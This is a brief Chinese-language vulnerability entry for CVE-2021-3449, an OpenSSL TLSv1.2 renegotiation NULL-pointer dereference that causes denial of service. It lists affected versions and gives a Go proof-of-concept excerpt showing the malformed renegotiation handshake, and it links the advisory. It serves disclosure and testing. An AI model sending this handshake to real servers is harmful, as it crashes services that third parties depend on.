# OpenSSL 拒绝服务漏洞（CVE-2021-3449）

OpenSSL TLSv1.2 重新协商选项（默认开启）中存在一处空指针解引用，并导致拒绝服务。

影响版本：

openssl:openssl < 1.1.1-k

PoC：

```
Usage: go run . -host hostname:port
```


```
// CVE-2021-3449 exploit code.
if hello.vers >= VersionTLS12 {
    if c.handshakes == 0 {
        println("initial handshake")
        hello.supportedSignatureAlgorithms = supportedSignatureAlgorithms
    } else {
        // OpenSSL pre-1.1.1k runs into a NULL-pointer dereference
        // if the supported_signature_algorithms extension is omitted,
        // but supported_signature_algorithms_cert is present.
        println("malicious handshake")
        hello.supportedSignatureAlgorithmsCert = supportedSignatureAlgorithms
    }
}
```

ref：

* https://github.com/terorie/cve-2021-3449
* https://www.openssl.org/news/secadv/20210325.txt